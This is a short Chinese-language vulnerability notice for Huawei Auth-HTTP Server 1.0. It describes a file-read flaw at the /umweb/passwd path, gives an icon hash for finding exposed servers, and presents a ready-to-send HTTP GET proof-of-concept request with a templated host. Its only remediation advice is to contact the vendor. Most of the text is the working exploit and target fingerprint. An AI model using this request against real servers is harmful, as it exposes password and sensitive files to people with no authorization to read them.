Nx01 产品简介
Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。
Nx02 漏洞描述
华为Auth-Http服务存在文件读取漏洞。访问umweb/passwd可以读取文件敏感信息。
Nx03 产品主页
web.icon=="be2408ce4716a5cfc50dd0ada76619d6"
Nx04 漏洞复现
POC:
GET /umweb/passwd HTTP/1.1
Host: {
{Hostname}}
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Nx05 修复建议
建议联系软件厂商进行处理。
